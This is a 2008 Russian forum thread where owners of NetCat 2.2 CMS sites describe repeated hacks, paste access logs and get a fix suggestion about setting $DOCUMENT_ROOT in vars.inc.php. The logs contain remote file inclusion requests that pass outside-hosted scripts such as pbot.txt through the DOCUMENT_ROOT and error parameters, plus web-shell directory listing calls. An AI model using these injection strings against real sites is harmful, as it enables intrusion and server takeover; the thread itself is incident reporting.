Регистрация
Регистрируясь, вы подтверждаете свое согласие с соглашением об использовании персональных данных.
Восстановление пароля

NetCat 2.2 Small Business - ломаю сайт...

17.09.2008, 10:48
Nemo
НПЦ Владис

Зарегистрирован:
2005-02-17
Сообщений: 48

стандартная установка, ничего лишнего нет...
понимаю что и версия старинная и скорее всего никому не интересная но все таки...

Много у кого еще стоит, вот случай..
сайт был на Агаве и ломали раз в 2 часа, делалось все что возможно... решили сменить хостинг поменяли Агаву, на Мастерхост... 5 дней и теже грабли...

сам сайт может даже и жить, но в фтп появляется море не нужного хлама и начинается спам с сайта, как следствие сильно нагружается хостинг и хостеры нервничают....

ну обновления все что были ранее стоят, права также.. .htaccess по умолчанию...


как именно это происходит...

zooservis.ru 8.14.238.43 - - [17/Sep/2008:00:02:46 +0400] "GET /s_loadenv.inc.php?act=ls&d=%2Fhome%2Fu149907%2Fzooservis.ru%2Fwww%2Fnetcat%2F&sort=0a HTTP/1.0" 404 41270 "http://www.zooservis.ru//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.fiweh.com/designs/skins/default_green/customer/addons/wholesale_trade/config2?" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"

zooservis.ru 8.14.238.43 - - [17/Sep/2008:00:02:47 +0400] "GET /images/zooservis.gif HTTP/1.0" 200 8198 "http://www.zooservis.ru//s_loadenv.inc.php?act=ls&d=%2Fhome%2Fu149907%2Fzooservis.ru%2Fwww%2Fnetcat%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"

zooservis.ru 8.14.238.43 - - [17/Sep/2008:00:02:48 +0400] "GET /images/sound.swf HTTP/1.0" 200 135884 "http://www.zooservis.ru//s_loadenv.inc.php?act=ls&d=%2Fhome%2Fu149907%2Fzooservis.ru%2Fwww%2Fnetcat%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"

zooservis.ru 8.14.238.43 - - [17/Sep/2008:00:02:48 +0400] "GET /images/tbl_leftb.gif HTTP/1.0" 200 429 "http://www.zooservis.ru//s_loadenv.inc.php?act=ls&d=%2Fhome%2Fu149907%2Fzooservis.ru%2Fwww%2Fnetcat%2F&sort=0a" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"

zooservis.ru 216.142.158.56 - - [17/Sep/2008:02:22:37 +0400] "GET /index.php?DOCUMENT_ROOT=http://geocities.com/bogorbudak/pbot.txt?? HTTP/1.0" 200 - "-" "libwww-perl/5.808"

zooservis.ru 216.142.158.56 - - [17/Sep/2008:02:22:37 +0400] "GET /index.php?DOCUMENT_ROOT=http://geocities.com/bogorbudak/pbot.txt?? HTTP/1.0" 200 - "-" "libwww-perl/5.808"

zooservis.ru 216.142.158.56 - - [17/Sep/2008:02:22:37 +0400] "GET /index.php?DOCUMENT_ROOT=http://geocities.com/bogorbudak/pbot.txt?? HTTP/1.0" 200 - "-" "libwww-perl/5.808"

zooservis.ru 216.142.158.56 - - [17/Sep/2008:02:22:37 +0400] "GET /index.php?DOCUMENT_ROOT=http://geocities.com/bogorbudak/pbot.txt?? HTTP/1.0" 200 - "-" "libwww-perl/5.808"

zooservis.ru 216.142.158.56 - - [17/Sep/2008:02:22:37 +0400] "GET /index.php?DOCUMENT_ROOT=http://geocities.com/bogorbudak/pbot.txt?? HTTP/1.0" 200 - "-" "libwww-perl/5.808"

zooservis.ru 216.142.158.56 - - [17/Sep/2008:02:22:37 +0400] "GET /index.php?DOCUMENT_ROOT=http://geocities.com/bogorbudak/pbot.txt?? HTTP/1.0" 200 - "-" "libwww-perl/5.808"

zooservis.ru 216.142.158.56 - - [17/Sep/2008:02:23:40 +0400] "GET /index.php?DOCUMENT_ROOT=http://geocities.com/bogorbudak/pbot.txt?? HTTP/1.0" 200 - "-" "libwww-perl/5.808"

zooservis.ru 216.142.158.56 - - [17/Sep/2008:02:23:40 +0400] "GET /index.php?DOCUMENT_ROOT=http://geocities.com/bogorbudak/pbot.txt?? HTTP/1.0" 200 - "-" "libwww-perl/5.808"

zooservis.ru 216.142.158.56 - - [17/Sep/2008:02:23:40 +0400] "GET /index.php?DOCUMENT_ROOT=http://geocities.com/bogorbudak/pbot.txt?? HTTP/1.0" 200 - "-" "libwww-perl/5.808"

zooservis.ru 216.142.158.56 - - [17/Sep/2008:02:23:40 +0400] "GET /index.php?DOCUMENT_ROOT=http://geocities.com/bogorbudak/pbot.txt?? HTTP/1.0" 200 - "-" "libwww-perl/5.808"

zooservis.ru 216.142.158.56 - - [17/Sep/2008:02:23:40 +0400] "GET /index.php?DOCUMENT_ROOT=http://geocities.com/bogorbudak/pbot.txt?? HTTP/1.0" 200 - "-" "libwww-perl/5.808"

zooservis.ru 216.142.158.56 - - [17/Sep/2008:02:23:40 +0400] "GET /index.php?DOCUMENT_ROOT=http://geocities.com/bogorbudak/pbot.txt?? HTTP/1.0" 200 - "-" "libwww-perl/5.808"

zooservis.ru 77.242.25.249 - - [17/Sep/2008:02:26:38 +0400] "GET /index.php?DOCUMENT_ROOT=http://www.freewebs.com/groupalb/x.txt?? HTTP/1.0" 200 - "-" "Mozilla/3.0 (compatible; Indy Library)"

zooservis.ru 77.242.25.249 - - [17/Sep/2008:02:26:38 +0400] "GET /index.php?DOCUMENT_ROOT=http://www.freewebs.com/groupalb/x.txt?? HTTP/1.0" 200 - "-" "Mozilla/3.0 (compatible; Indy Library)"

zooservis.ru 77.242.25.249 - - [17/Sep/2008:02:26:45 +0400] "GET /index.php?DOCUMENT_ROOT=http://www.freewebs.com/groupalb/x.txt?? HTTP/1.0" 200 - "-" "Mozilla/3.0 (compatible; Indy Library)"


Антон
17.09.2008, 15:31
skype: celenia_yaz
Mirson Dev Team
skype: celenia_yaz

Зарегистрирован:
2007-03-13
Сообщений: 13

Взломы у моего клиента (sb2.2) происходили из-за того, что не было прописано $DOCUMENT_ROOT в vars.inc.php . Его 100% нужно явно указывать

mirsonstudio
06.11.2008, 10:05
Гость
Гость

Такая же проблема, взломали сайт в логах:

66.40.52.30 - - [03/Nov/2008:07:58:11 +0300] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.0" 404 2860 "-" "libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:07:58:12 +0300] "GET /errors.php?error=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.0" 404 2860 "-" "libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:07:58:15 +0300] "GET /errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.0" 404 2860 "-" "libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:07:58:30 +0300] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.0" 404 2860 "-" "libwww-perl/5.800"
и т.д.

хостер сайт отключил, подскажите варианты выхода из данной ситуации
06.11.2008, 15:07
Гость
Гость

Вам сюда
198 196 2008-11-06 15:07:49 9428
Описание проекта